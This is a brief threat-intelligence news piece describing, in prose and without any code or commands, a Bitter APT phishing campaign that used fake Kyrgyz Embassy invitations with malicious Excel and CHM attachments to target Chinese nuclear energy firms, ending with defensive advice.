Bitter APT espionage group, known for targeting energy and government sectors in South and Southeast Asia, has been observed carrying out fresh campaigns targeting critical organizations in China. The TTPs are consistent with the past attacks and include phishing emails with Excel and Compiled HTML Help (CHM) attachments.
Targeting nuclear energy firms
Intezer researchers reported that the attack begins with a fake email sent to various nuclear energy companies and academics in China, pretending to be sent by the Embassy of Kyrgyzstan in Beijing.
- It talks about an invitation to a nuclear energy-related conference, held by the International Atomic Energy Agency (IAEA), the China Institute of International Studies (CIIS), and the Kyrgyz Embassy.
- The email includes names of genuine officials from the Kyrgyzstan Ministry of Foreign Affairs to make it look legitimate.
- The email urges the users to download the attached RAR file with the so-called invitation card for the conference. However, it comprises a malicious Excel file or a CHM.
Attack flow
The malicious Excel or CHM files are aimed at establishing persistence and downloading further payloads on the infected machine.
- The Excel file contains an Equation Editor exploit. When executed, it creates two scheduled tasks to run every 15 minutes and download the next stage EXE payload via curl.
- The CHM files are used to execute arbitrary code. It is used to create a scheduled task to run msiexec to fetch a remote MSI payload from the C2 and execute it.
- Another variant of the CHM file payload uses encoded PowerShell command to create the same scheduled task, thus, obfuscating the activity.
Although researchers could not capture the actual payload used for the second-stage attack, it is suspected to be keyloggers, info-stealers, or RATs, as used in previous attacks by Bitter APT.
Concluding notes
Bitter APT has been using similar attack tactics, including phishing emails, for several years. Therefore, relevant organizations in Asia Pacific are suggested to stay cautious when receiving emails from unknown entities and double-check the validity of the sender before proceeding. Furthermore, CHM files are not commonly used by organizations and should be avoided. All the tactics used in Bitter APT attacks are well-known and can be thwarted with proper awareness of the current trends.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/bfea_shutterstock_1678284208.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/900b_shutterstock_1454959556_1.jpg)
